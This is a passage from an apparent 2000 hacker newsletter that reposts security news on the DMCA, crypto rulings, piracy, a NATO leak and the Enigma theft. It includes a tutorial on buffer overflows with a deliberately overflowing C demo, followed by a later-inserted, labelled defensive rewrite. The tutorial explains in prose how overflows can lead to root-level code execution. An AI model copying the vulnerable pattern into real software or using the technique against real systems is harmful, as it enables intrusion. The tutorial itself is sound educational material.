      privacy-circumvention loophole? 

      The answer may well be yes. "The statute is basically totally incoherent," 
      says Pam Samuelson, a professor at the University of California at 
      Berkeley and an influential copyright scholar. 

      "We're getting tortured by laws that are inherently incoherent," 
      complained Barry Steinhardt, associate director of the ACLU. 

      Violating the DMCA is a civil offense, and "willfully" violating it for 
      private financial gain is a criminal offense punishable by five years in 
      jail and a $500,000 fine. 
      
      
      
      
      (Cookies are a dead non-issue, get over it - Ed)
      
      @HWA
      
      
      
201.0 HNS:Apr 7th:SECURE E-MAIL SERVICE
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Friday 7 April 2000 on 3:39 PM
      The Royal Mail has launched a secure e-mail service through its secure
      technology service, ViaCode.
      Link: Silicon.com
               ____________________________________________________
      
      http://www.silicon.com/public/door?REQUNIQ
      ----------
      
      @HWA
      
202.0 HNS:Apr 7th:ONLINE MUGGERS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ
      Friday 7 April 2000 on 3:38 PM
      "You are running a Web site. Making money perhaps, and visitors are
      seeing your message. Then, according to your perimeter
      intrusion-detection device, some online goofball or criminal hacker is
      beating on your door. What are you going to do?" Read Winn Schwartau's
      article.
      Link: IDG.net
               ____________________________________________________
      
      http://www.idg.net/servlet/ContentServlet?global_doc_id
      ----------

      We're sorry but we are currently unable to process your request.
      Please try again later. If you continue to get this message, 
      please go to Feedback and let us know. We apologize for the 
      inconvenience.
      
      (Guess they were mugged ... -Ed)
      
      
      @HWA
      
      
      
203.0 HNS:Apr 6th:SURVEY BY DTI
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by BHZ
      Thursday 6 April 2000 on 3:00 PM
      British companies are too complacent when it comes to Internet
      security and only have themselves to blame if their IT systems are
      compromised by hackers. That is one of the conclusions published by
      Department of Trade and Industry. Contributed by Lady Sharrow.
      Link: The Register
               ____________________________________________________
      
      http://www.theregister.co.uk/000406-000023.html
      ----------
      
      Printed elsewhere      
      
      @HWA
      
      
204.0 HNS:Apr 6th:COMPUTER CODES PROTECTED
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Thursday 6 April 2000 on 1:58 PM
      Computer programs used to scramble electronic messages are protected
      by the First Amendment because those codes are a means of
      communication among programmers, a federal appeals court ruled
      Tuesday.
      Link: Associated Press
               ____________________________________________________
      
      http://www.worldnews.com/?action
      ----------
      
      bad url
      
      Internal Server Error
      The server encountered an internal error or misconfiguration and 
      was unable to complete your request.
 
      Please contact the server administrator, will@sowerbutts.com and
      inform them of the time the error occurred, and anything you might
      have done that may have caused the error.

      More information about this error may be available in the server 
      error log.
      
      
      (sourbutts? LOL - Ed)
      
      
      @HWA
      
      
205.0 HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Thursday 6 April 2000 on 1:57 PM
      A 50-year-old man has been released on police bail after being
      questioned by detectives investigating the disappearance of the Enigma
      encoding machine.
      Link: BBC
               ____________________________________________________
      
      http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm
      ----------
      
      Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK 

      Man released after code machine theft

      Bletchley Park: Centre for wartime code-breaking effort

      A 50-year-old man has been released on police bail after being questioned 
      by detectives investigating the disappearance of the Enigma encoding 
      machine. The man, from Bedfordshire, was arrested on Tuesday and 
      released after questioning at Milton Keynes police station. 

      Police have mounted a massive search for the historic machine, which 
      cracked the Nazi Enigma code during the Second World War. 

      It was stolen in broad daylight from a glass cabinet at the Bletchley Park 
      museum on Saturday, where it was on display. 

      Police officers were preparing to trawl a lake on the estate and search 
      the mansion. 

      Thames Valley Police spokesman John Brett said: "A search of the mansion 
      and the grounds of Bletchley Park will start under the supervision of a 
      police search adviser and a team of 10 police officers. 

      
      The missing Enigma machine

      "There is a possibility that a Thames Valley Police underwater search unit 
      may be used to search the lake in Bletchley Park. 

      "It could be hidden under the stairs in the mansion, there are lots of 
      places it could be." 

      Detectives think the thief could have abandoned the Enigma machine within 
      the 50-acre grounds of the estate, or in one of the 70 rooms in the 
      mansion. 

      The museum in Milton Keynes, Buckinghamshire, was raided in full view of 
      visitors during an open day on Saturday. 

      The Enigma - one of only three in the world - is worth up to £100,000 and 
      was used by the Germans to encrypt messages sent during the Second World 
      War. 

      Bletchley Park is believed to have shortened the war by cracking the code. 

      Detectives were appealing for any visitors on Saturday who took pictures 
      or video footage to contact police in the hope they might identify the 
      thief. 

      Reward offered 

      Mr Brett urged whoever stole the machine not to be tempted to destroy the 
      evidence in the light of massive publicity. 

      He added: "If it's a prank that's gone wrong, don't destroy it because our 
      main priority is getting it back." 

      A £5,000 reward is being offered by BT, owners of part of the site in 
      Milton Keynes since World War II. 

      "It is a tragedy that the machine has been stolen," Alan White, director 
      of BT's property division, said. 

      
      
      @HWA
      
      
      
206.0 HNS:Apr 6th:CYBERPATROL BLOCK LIST
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Thursday 6 April 2000 on 1:36 PM
      Our affiliates at Security Watch wrote that a list of thousands of
      hosts, websites and Usenet groups blocked by Microsystems Software
      Inc.'s CyberPatrol software has been published on the web.
      Link: Security Watch
               ____________________________________________________
      
      http://www.securitywatch.com/scripts/news/list.asp?AID
      ----------
      
      @HWA
      
207.0 HNS:Apr 5th:CRYPTO REGULATIONS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Wednesday 5 April 2000 on 12:27 PM
      Privacy advocates won a preliminary victory when for the second time a
      federal appeals court questioned restrictions on data-scrambling
      encryption software.
      Link: Wired
               ____________________________________________________
      
      http://www.wired.com/news/politics/0,1283,35425,00.html
      ----------
      
      Crypto Regs Challenged Again 

      By Declan McCullagh 
      4:00 p.m. Apr. 4, 2000 PDT 

      Privacy advocates won a preliminary victory when for the second time a 
      federal appeals court questioned restrictions on data-scrambling 
      encryption software. 

      The Sixth Circuit Court of Appeals suggested Monday that President 
      Clinton's restrictions on distributing encryption products might be 
      unconstitutional. 

      
      "Because computer source code is an expressive means for the exchange of 
      information and ideas about computer programming, we hold that it is 
      protected by the First Amendment," a three-judge panel said in a unanimous 
      17KB decision. 

      That decision reversed a July 1998 ruling by a federal district court. 

      And while the panel did not strike down the Clinton administration's 
      regulations, it did refer the matter back to U.S. District Judge James 
      Gwin for another hearing. Earlier Gwin had ruled the First Amendment did 
      not apply. 

      The Justice Department says source code is akin to instructions for a 
      machine, and rules governing its distribution are necessary for national 
      security reasons. 

      Now that the appeals court has ruled source code is protected by the First 
      Amendment, the government will have a much tougher time arguing it should 
      have the power to imprison a law professor for posting a book on his 
      website. 

      Peter Junger, a professor at Case Western Reserve University School of 
      Law, sued the federal government after it told him he needed a license to 
      post a chapter of his Computers and the Law textbook online. 

      The American Civil Liberties Union, which represents Junger, applauded the 
      ruling. 

      "This is a great day for programmers, computer scientists and all 
      Americans who believe that privacy and intellectual freedom should be free 
      from government control," said ACLU Legal Director Raymond Vasvari. 

      In a separate case that also challenges the criminal penalties the U.S. 
      government imposes for unauthorized encryption distribution, the 9th U.S. 
      Circuit Court of Appeals in May 1999 ruled that encryption source code was 
      speech protected by the First Amendment. 

      "We conclude that the challenged regulations allow the government to 
      restrain speech indefinitely with no clear criteria for review," the 9th 
      Circuit panel said in its decision in a case brought by math professor 
      Daniel Bernstein. 

      But it's not clear what happens next in either the Junger or Bernstein 
      cases. The Clinton administration relaxed the regulations in January, and 
      the move is likely to delay both lawsuits for some time. 

      In fact, the Commerce Department, which administers the regulations, says 
      that Bernstein no longer has anything to worry about. 

      "You ask for an advisory opinion in light of your concern that the new 
      regulations 'continue to interfere with Professor Bernstein's planned 
      scientific activities.' Your concerns are unfounded," a Commerce 
      Department Bureau of Export Administration official wrote to Bernstein's 
      lawyers in February. 

      Bernstein asked in March for a rehearing by the district court to take 
      into account the regulation changes. 
      
      
      @HWA
      
      
      
208.0 HNS:Apr 5th:GFI AND NORMAN TEAM UP
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by BHZ
      Wednesday 5 April 2000 on 12:24 PM
      GFI and Norman have teamed up to integrate the Norman Virus Engine
      with GFI's e-mail security gateway, Mail essentials.
      Link: ESJ
               ____________________________________________________
      
      http://www.esj.com/breaknewsdisp.asp?ID
      ----------
      
      @HWA
      
      
209.0 HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by BHZ
      Wednesday 5 April 2000 on 12:23 PM
      MasterCard has taken the unusual step of offering a free virus repair
      service as a key feature in its small business card package.
      Link: Computer Currents
               ____________________________________________________
      
      http://www.currents.net/newstoday/00/04/05/news5.html
      ----------
      
      MasterCard Offers Virus Repair Service 

      By Steve Gold, Newsbytes 
      April 05, 2000

      
      MasterCard has taken the unusual step of offering a free virus repair 
      service as a key feature in its small business card package.

      The card issuer has tapped Vipro Corp., for the service, which is 
      available to all MasterCard Executive BusinessCard holders.

      For those cardholders that require the service, MasterCard is offering 
      Vipro's Virus Service Plan (VSP), a normally paid-for facility, free of 
      charge to BusinessCard holders.

      Vipro's Virus Service Plan is billed as providing computer users 
      "coverage" from destructive viruses. If a virus damages a plan holder's 
      computer, Vipro will repair it at no charge to the member.

      The service, which is designed for consumers and small business owners, 
      includes a copy of Norton AntiVirus as standard, as well as online and 
      telephone technical support.

      In the event that Norton AntiVirus and/or support from a telephone tech 
      support person cannot assist the user in getting his/her PC back up and 
      running, Vipro says it has a network of more than 7,000 local repair 
      centers available across the US.

      Bernie Brenner, Vipro's president, said that small businesses are 
      extremely vulnerable to computer virus attacks. "As more businesses plug 
      into the Internet and conduct more of their day-to-day business 
      transactions online, the chance of a virus attack increases," he said.

      Newsbytes notes that the MasterCard Virus Service Plan is included free as 
      a MasterCard Executive BusinessCard benefit and includes free virus repair 
      reimbursement, Web technical support, a three-month trial of Norton 
      Antivirus, telephone technical support, and access to the online virus 
      resource center.

      MasterCard's Web site is at http://www.mastercard.com . Vipro's Web site 
      is at http://www.vipro.com .

      Reported by Newsbytes.com
      
      
      @HWA
      
      
      
210.0 HNS:Apr 5th:BUFFER OVERFLOWS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      

      by BHZ
      Wednesday 5 April 2000 on 3:12 AM
      In a survey held amongst readers of the security/vulnerability report
      list "Bugtraq" a few months ago, approximately 2/3 of the respondents
      thought the so-called "buffer overflows" to be the dominating security
      problem. Read the new Default article, which deals with buffer overflows.
      Link: Default
               ____________________________________________________
      
      http://net-security.org/default/articles/09/02.shtml
      ----------
      
      DEFAULT ARTICLES

      

      Smashing the what?? 

      An introduction to memory buffers and an explanation of their possible 
      uses as weaknesses -- by Thejian 

      Introduction 

      In a survey held amongst readers of the security/vulnerability report 
      list "Bugtraq" a few months ago, approximately 2/3 of the respondents 
      thought the so-called "buffer overflows" to be the dominating security 
      problem (http://immunix.org/SlackGuard/discex00.pdf). When you troll 
      through the messages and advisories on this same list, you indeed get 
      the impression this might not be too far from the truth, since the lil' 
      boogers are mentioned everywhere. In the following article I'll try to 
      explain a bit more about the way memory is handled on a system and how 
      these buffer problems can be used to exploit it. Most of the various 
      files floating around out there, however, require quite a background in 
      programming etc. to understand; I'll try to make this understandable 
      even for those of you who do not exactly meet that requirement (maybe 
      particularly those of you). I hope to "simplify", not "dumbify", but 
      still this is just a basic approach, useful as an introduction to the 
      more technical texts by individuals such as Dr. Mudge, Elias Levy 
      (Aleph One) and many others (see bibliography). So if you were born with 
      pure ASM running through your veins you might want to look elsewhere; 
      if however you're just the average enthusiast wanting to know what all 
      those "elite" people are talking about, do read on :) 

      What are these "buffers" you keep talking about? 

      A computer program basically is a set of instructions and requests. This 
      can most easily be illustrated in the form of the famous "if-then-else" 
      loop. An instruction is run, resulting in variables which decide the 
      course of the program while the follow-up instructions are run. A buffer 
      (in programming) is an area in the memory shared by different processes 
      on the system. Basically a buffer makes it possible to make different 
      processes run simultaneously without holding each other up, or to hold 
      data in a place where it can be manipulated before it's moved to a file. 
      The program also needs a way to "remember" how to follow up when the 
      current instruction is done, what to do next. This is where the "Stack" 
      comes in. 

      The what?? 

      The Stack (or "push-down list") is a (dynamically) growable area of the 
      memory where, when a program is executed, it dumps its data (variables, 
      memory addresses etc.), which gets manipulated by whatever rules and 
      algorithms are present/applicable, and then continues. Then the "next 
      to-do" instruction is taken from the top of the Stack and executed. 
      "From the top" might give you the impression this process is defined by 
      means of a predestined orderly list of any kind. The way this actually 
      works, however, is that the last instruction passed on to the system to 
      be executed ends up on top of the stack, so you could say it works in a 
      "last in - first out" manner. 

      The top and bottom of the stack are defined by the Stack pointer (which 
      holds the memory address where the top of the Stack can be found) and 
      the Base pointer (which obviously is the other one, pointing at the 
      bottom or base of the Stack). Contrary to what might seem logical, the 
      numbers associated with the memory addresses start at the bottom of the 
      stack (hence the "base") and count up from there. Because of this, 
      programs generally refer to the BP for the location of their data. This 
      means the start of a 10-character instruction is not called SP + 1 but 
      BP - 11 (or actually BP + 11, because of the numbers counting up 
      "backwards"). 

      The Buffer Overflow 

      As said before, a buffer is an area shared by different processes. 
      Obviously there is a need for a certain flexibility here, to allow this 
      changing of different processes to actually happen and to allow it to be 
      called from different positions in the program. These buffers are subject 
      to certain rules though and overflowing them is nothing more than the word 
      says, breaking those rules by filling up a buffer by putting more in it 
      than fits in. (think of trying to hammer the triangle into the mold of a 
      circle :) 

      An example: (part of the doc on writing Buffer Overflows by Dr. Mudge of 
      L0pht Heavy Industries, mentioned in the bibliography) 

      --------syslog_test_1.c------------
      /* Mudge's demonstration program. The defects are deliberate: the loop
         bound (i <= 4028) writes one byte past the 4028-byte array, and the
         buffer is never NUL-terminated, so syslog() reads beyond its end. */
      #include <syslog.h>

      char buffer[4028];

      int main(void)
      {
          int i;

          for (i = 0; i <= 4028; i++)
              buffer[i] = 'A';
          syslog(LOG_ERR, buffer);
          return 0;
      }
      --------end syslog_test_1.c----------

      
      What happens here is that the buffer, which is set to contain 4028 
      characters, is filled with A's as long as the count of A's is less than 
      or equal to 4028. Obviously the set buffer size eventually is exceeded, 
      causing the buffer to "overflow". The system returns: 

      Program received signal 11, Segmentation fault 

      0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141) 

      or pops up something like the following (when in Windows): 

      "The Instruction at '0x1273' referenced memory at '0x41414141'. The memory 
      could not be read." 

      Here the second line tells us a number of things, such as the location 
      where it crashed. The 41's you see are the hex equivalent of the ASCII 
      character 'A'. 
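      An added example (not from Thejian's article or Mudge's paper): the
      same fill loop written with a correct bound and a NUL terminator, plus a
      small crash-triage helper that flags a faulting address such as
      0x41414141 as overwritten fill data rather than a real pointer. The
      names fill_bounded and repeated_fill_byte are mine, not from either text.

```c
/* Added example: a bounded version of the syslog_test_1.c loop and a
 * helper for reading crashes like "vsyslog (0x41414141, ...)".
 * fill_bounded and repeated_fill_byte are names chosen for this example. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

#define BUF_SIZE 4028

/* Fill dst with `fill`, always leaving room for the terminating NUL.
 * Returns the number of fill characters written (excluding the NUL).
 * The page's loop used `i <= 4028` on a 4028-byte array, so it wrote one
 * byte past the end and never terminated the string; the bound below
 * is `i < cap - 1`, which can neither overrun nor leave it unterminated. */
size_t fill_bounded(char *dst, size_t cap, char fill)
{
    size_t i;
    if (cap == 0)
        return 0;
    for (i = 0; i < cap - 1; i++)
        dst[i] = fill;
    dst[i] = '\0';
    return i;
}

/* Triage heuristic for a faulting address from a crash report.
 * If all four bytes are the same printable character (0x41414141 is
 * four 'A's), the value was almost certainly copied in from fill data
 * that overwrote a saved pointer, not a genuine address.
 * Returns the repeated byte, or 0 when the address shows no such pattern. */
int repeated_fill_byte(uint32_t addr)
{
    unsigned b0 = addr & 0xffu;
    unsigned b1 = (addr >> 8) & 0xffu;
    unsigned b2 = (addr >> 16) & 0xffu;
    unsigned b3 = (addr >> 24) & 0xffu;

    if (b0 == b1 && b1 == b2 && b2 == b3 && isprint((int)b0))
        return (int)b0;
    return 0;
}

int main(void)
{
    static char buffer[BUF_SIZE];
    size_t n = fill_bounded(buffer, sizeof buffer, 'A');

    /* Pass the buffer as an argument, never as the format string itself. */
    syslog(LOG_ERR, "%s", buffer);
    printf("wrote %zu bytes, last byte is NUL: %s\n", n,
           buffer[sizeof buffer - 1] == '\0' ? "yes" : "no");

    /* Interpret the address from the page's crash output (constructed input). */
    int fb = repeated_fill_byte(0x41414141u);
    if (fb)
        printf("0x41414141 looks like repeated fill byte '%c'\n", fb);
    return 0;
}
```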

      Gee that's nice.. but what can I do with it? 

      Most network/server systems manage a variety of different accounts to keep 
      track of which user is where doing what, and to make sure no user could 
      have access to things (be it files or processes/services) he or she 
      shouldn't have. Obviously the accounts with the higher privileges are the 
      most interesting ones, because they give access to and allow 
      manipulation/execution of a lot more things. What you'd want to do is to 
      exploit a Buffer Overflow in something (program/service/etc.) run by one 
      of these accounts, allowing you to change the position indicating the 
      "next-to-do" instruction and possibly allowing you to execute your own 
      code. By overwriting this pointer with (enough of) the value you use to 
      overflow the buffer, the program is redirected to (when using the A's 
      mentioned in the above example) address 0x41414141 and executes the 
      instructions it finds there. The beauty of this all is that these 
      instructions are run with the privileges of the account whose process 
      you interrupted. This way you could pop up a command prompt as root or 
      run code you wrote/uploaded on another account with the privileges of 
      the administrator. Imagine the possibilities :) So as Mudge says, "put 
      on those warp refraction eye-goggles and on we go"! 

      The more technical side (or: Bibliography) 

      Now you have a bit of an understanding as to what buffer overflows 
      actually are and how they work, or at least so I hope. If you got the 
      taste for it now, or just want to experiment, you now might want to move 
      on to the next mentioned files: 

      "Smashing The Stack For Fun And Profit", Elias Levy(Aleph One)       
      http://www.phrack.com/search.phtml?view&article=p49-14

      "How to write Buffer Overflows", dr. Mudge       
      ftp://ftp.technotronic.com/rfc/bufferoverflows.html 

      "The Tao of the Windows Buffer Overflow", Dildog       
      http://www.cultdeadcow.com/cDc_files/cDc-351/index.html 

      "Exploiting Windows NT4 Bufferoveruns; a case study: RASMAN.EXE", David 
      Litchfield       
      http://packetstorm.securify.com/9905-exploits/ntbufferoveruns.txt 

      "W00w00 on Heap Overflows", w00w00 security       
      http://packetstorm.securify.com/docs/infosec/buffer-overflows/w00w00-heap-overflows.txt

      
      
      @HWA
      
     
211.0 HNS:Apr 5th:PIRACY
      ~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by LogError
      Wednesday 5 April 2000 on 12:11 AM
      Washington state, with an economy that has boomed along with
      Microsoft's, has launched a crackdown on state employees who illegally
      circulate pirated software on government computers.
      Link: APB News
               ____________________________________________________
      
      http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html
      ----------
      
      Microsoft's Home State Cracks Down on Piracy
      Washington Governor's Order Targets Software Copying 
      April 4, 2000 
      
      By David Noack 
      
      OLYMPIA, Wash. (APBnews.com) -- Washington state, with an economy that has 
      boomed along with Microsoft's, has launched a crackdown on state employees 
      who illegally circulate pirated software on government computers. 

      Gov. Gary Locke signed an executive order Monday aimed at preventing the 
      illegal acquisition and distribution of programs using state equipment or 
      funds. 

      "We are working diligently to combat computer software piracy," Locke 
      said. "As a major purchaser and user of computer software, Washington 
      state government must set an example in acquiring and using legally 
      licensed software." 

      Washington now becomes the fourth state to issue strict policies and 
      guidelines dealing with software piracy in state government. The other 
      states are California, Nevada and Colorado. 

      The executive order 

      The executive order directs all state agencies to take the following 
      actions: 

      
      - Adopt procedures to prevent the unlawful acquisition, reproduction, 
        distribution or transmission of computer software 
      - Establish procedures to ensure that computer software use complies 
        with the law 
      - Take appropriate measures if contractors or financial assistance 
        recipients use state funds to acquire, operate or maintain illegal 
        software. 

      In addition to the illegality of having pirated software, Locke also 
      cited economic concerns for issuing the order. 

      Estimates of 4,000 jobs lost 

      "Illegal software use has a very damaging impact on Washington's economy," 
      Locke said. "We cannot tolerate counterfeiters who try to make a quick 
      buck by pawning illegal software to honest consumers at the expense of 
      Washington's taxpayers." 

      Computer industry estimates show pirated software costs Washington's 
      economy almost 4,000 jobs annually and more than $200 million in lost 
      wages. 

      The state is home to more than 7,000 high-technology businesses, including 
      software developers, software training groups, and software and hardware 
      service organizations. These businesses employ more than 76,000 people and 
      pay more than $3.7 billion in annual wages. 

      Computer trade associations such as the Software Information Industry 
      Association (SIIA) and the Business Software Alliance (BSA) have long 
      argued that software piracy costs the industry billions annually and have 
      called for more software auditing. 

      Peter Beruk, vice president of anti-piracy programs at the SIIA, said that 
      an executive order dealing with software piracy sends a message to the 
      state bureaucracy that this kind of behavior won't be tolerated. 

      "It helps having a governor issuing an executive order like this," Beruk 
      said. "It puts notice on people who are responsible for this to do the 
      right thing. It gives them, the people actually responsible for doing 
      this, ... an important job. The governor has directed us to do this." 

      Officials from the Microsoft Corp. and Adobe Systems Inc. were quick to 
      applaud the governor's actions to protect intellectual property rights in 
      Washington state. 

      On the federal level, President Clinton issued a national executive order 
      against software piracy in October 1998, and other countries around the 
      globe ranging from China to Norway to Colombia have issued such 
      intellectual property directives. 

      A leadership role 

      Locke will speak about the executive order today at a meeting of the 
      Government Leaders Conference, where, in an address on "Digital 
      Government," he will highlight why the protection of intellectual property 
      is important in today's economy. 

      "We're encouraged to see Washington continue to take a state leadership 
      role in addressing the issue of intellectual property rights, as both 
      consumers and governments move into the digital era where the online world 
      becomes the norm for business transactions," said Anne Murphy, corporate 
      attorney at Microsoft. 

      The head of Washington's software industry also backed the governor's 
      efforts to protect intellectual property. 

      "Much focus over the years has been about foreign software piracy, 
      obscuring the fact that piracy is a rampant domestic issue," said Kathleen 
      Wilcox, president and chief executive officer of the Washington Software 
      Alliance. 

      Approximately 20 percent of the software used in Washington -- one out of 
      every five copies -- has been illegally copied, according to a 1998 study 
      by International Planning & Research Corp. 

      Pirate targets 

      Experts said that governments are often targets for software pirates, 
      mainly due to the low-bid government procurement processes in place. 
      Because many illegitimate software manufacturers now advertise their 
      products over the Internet -- where it is more difficult for consumers to 
      distinguish genuine from illegal software -- it has become increasingly 
      easy for customers at all levels to be deceived into believing that they 
      are acquiring genuine software. 

      "Washington state residents clearly don't want their taxpayer dollars 
      going toward pirated software or the organized crime rings that could be 
      distributing it," Microsoft's Murphy said. 

      Last month, Colorado Gov. Bill Owens issued an executive order dealing 
      with the use of legal, licensed computer software throughout the state 
      government. The order applies to all state agencies, as well as all third 
      parties doing business with the state. 

      "Government agencies are among the largest users of computer software and 
      must set a positive example by mandating the use of legal and licensed 
      software," said Becca Gould, the Business Software Alliance's vice 
      president of public policy. 

      According to the Business Software Alliance, the use of illegal software 
      costs nearly $11 billion annually -- $2.8 billion in the United States 
      alone. In 1998, proliferation of illegal software in the United States 
      resulted in the loss of 109,000 jobs, $4.5 billion in wages and nearly 
      $991 million in tax revenue. 

      According to a recent industry study, the piracy rate in Colorado is 27 
      percent, resulting in lost jobs and tax revenues throughout the state. 
      
      
      David Noack is an APBnews.com staff writer (david.noack@apbnews.com)
      
      
      @HWA
      
      
      
212.0 HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
  
      by LogError
      Wednesday 5 April 2000 on 12:05 AM
      Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has
      been broken! This was the largest public calculation ever to use a
      complex parallel algorithm. $5,000 dollars in winnings will be donated
      to the Free Software Foundation.
      Link: Slashdot
               ____________________________________________________
      
      http://slashdot.org/article.pl?sid
      ----------
      
      (article vanished or link has gone or some shit - Ed)      
      
      @HWA
      
      
213.0 HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/ 

      by LogError
      Wednesday 5 April 2000 on 12:02 AM
      Continuing its California courtroom battle against the Digital Video
      Disk industry over DVD encryption codes, the Electronic Frontier
      Foundation has appealed an injunction granted against more than 50 Web
      site operators in January.
      Link: Computer User
               ____________________________________________________
      
      http://www.currents.net/newstoday/00/04/04/news7.html
      ----------
      
      @HWA
      
214.0 HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      

      by LogError
      Wednesday 5 April 2000 on 12:01 AM
      The North Atlantic Treaty Organization has launched a full-scale
      investigation into how one of its top-secret documents ended up posted
      on the Internet. The Sunday Telegraph reports that an unknown virus is
      to blame for the posting of the nine-page document, detailing the
      alliance's rules of engagement in the southern Yugoslav province of
      Kosovo, on to the Net.
      Link: Computer User
               ____________________________________________________
      
      http://www.currents.net/newstoday/00/04/04/news3.html
      ----------
      
      Daily News Virus Blows a Hole in NATO's Security By Steve Gold, Newsbytes 
      April 04, 2000

      
      The North Atlantic Treaty Organization (NATO) has launched a full-scale 
      investigation into how one of its top-secret documents ended up posted on 
      the Internet.

      The Sunday Telegraph reports that an unknown virus is to blame for the 
      posting of the nine-page document, detailing the alliance's rules of 
      engagement in the southern Yugoslav province of Kosovo, on to the Net.

      Press reports this morning say that NATO moved into full swing over the 
      weekend after the British Ministry of Defence was alerted to the problem 
      late last week.

      The Sunday Telegraph said that the top secret document was spotted by a 
      London publishing house and reported to the relevant authority. BBC news 
      reports today, meanwhile, say that a virus may be to blame.

      NATO's Brussels headquarters said that a press briefing for the media is 
      expected later today. The Sunday Telegraph, meanwhile, quotes Jamie Shea, 
      a senior spokesperson for NATO, as saying that, if the investigation shows 
      that a NATO document has got into the public domain, "it will be a matter 
      of great concern to us."

      He added, "These are sensitive NATO documents. We would like to keep them 
      classified and prevent them being compromised."  

      Newsbytes' sources say that the document posted to the Net included NATO's 
      Rules of Engagement for Land Operations, which cover the circumstances 
      under which "appropriate measures, including the use of deadly force," may 
      be used.

      The Sunday Telegraph quotes an unnamed person at the London Publishing 
      company as saying that two people tried to open up a new document on a PC 
      and, instead, the NATO Kosovo document started to scroll up.

      "The next thing I knew, I was in a meeting around lunchtime when a message 
      came from reception saying, `Your guests have arrived.'"

      On returning to work, the member of staff was interviewed by two military 
      intelligence officers in plain clothes, who said words to the effect of, 
      "'This is something we are very worried about,' and started to ask 
      questions."

      Newsbytes' sources suggest that the NATO document was top secret 
      classified material, but the classification was changed to "restricted" 
      over the weekend to prevent further embarrassment.

      Sources also suggest that the document was posted to a Usenet group, but 
      was quickly deleted by a Ministry of Defence autobot, a software agent 
      that autodeletes questionable Usenet postings from the servers of 
      Usenet-enabled Internet service providers (ISPs) around the world.

      Graham Cluley, head of corporate communications with Sophos Anti- Virus, 
      was not surprised by the reports that a virus is to blame for the NATO 
      security breach.

      He pointed to worm payloads such as the infamous Melissa virus as 
      indicative of how easy it is to trigger an Internet posting without the 
      permission of the host PC operator.

      "These latest security breaches highlight that no one is immune to 
      security scares in any form," he said, adding that, if NATO can be hit by 
      a virus, "then it should serve as a salutary reminder to all of us that we 
      all need to be vigilant against computer crime and ensure the deployment 
      of quality, up-to-date anti-virus and encryption software.

      "In this particular case, NATO has suffered an embarrassment, but viruses 
      like Melissa have already shown us how it is possible for a virus to pass 
      on confidential material to thousands via just a few hops in an e-mail 
      address book," he said.

      "Perhaps more troubling though, is the fact that these viruses appear to 
      be causing much more serious harm than a virus whose payload is a playful 
      cartoon or Dr. Who quote," he added.

      Sophos' Web site is at http://www.sophos.com .

      Reported by Newsbytes.com
      
      
      @HWA
      
      
215.0 HNS:Apr 4th:FIGHT SPAM WITH SPAM
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      

      by BHZ
      Tuesday 4 April 2000 on 8:40 AM
      Cisco Systems is urging victims of spam to take the law into their own
      hands and deliver their own form of vengeance to combat unwanted
      e-mails. This was taken from booklet 'The Easy Guide to Network
      Security', which could be downloaded from their UK site.
      Link: The Register
               ____________________________________________________
      
      http://www.theregister.co.uk/000404-000001.html
      ----------
      
      (Now this is a real dumb thing for a reputable company to suggest
      ... - Ed)
      
      
      Posted 04/04/2000 7:02am by Tim Richardson

      Cisco tells spam victims to reply with abusive emails

      Cisco Systems is urging victims of spam to take the law into their own 
      hands and deliver their own form of vengeance to combat unwanted e-mails. 

      It claims the best way to deal with spammers is to reply with abusive 
      e-mails and to dump massive files that will clog up their servers. 

      It's the online equivalent to blowing a whistle down the phone line when 
      dealing with nuisance calls - or flicking the Vs at a motorist before 
      chasing them for five miles after they've carved you up. 

      The advice is contained in a booklet The Easy Guide to Network Security, 
      which is also published in an ungainly PDF file on Cisco's UK Web site. 

      Under the heading "Spam", it reads: "Spam is usually harmless, but it can 
      be a nuisance, taking up time and storage space. The solution is to flame 
      the perpetrators by sending them abusive messages, or to reply by dumping 
      a very large and useless file on their Web server." 

      It's not clear whether this is a corporate-wide policy or just applies to 
      the hard noses in Britain. 

      It's certainly a different approach from that pursued by British ISP, 
      BiblioTech, which goes to extreme lengths to chase spammers through the 
      courts. 

      Question is, have you received any spam from Cisco? If so, sounds like 
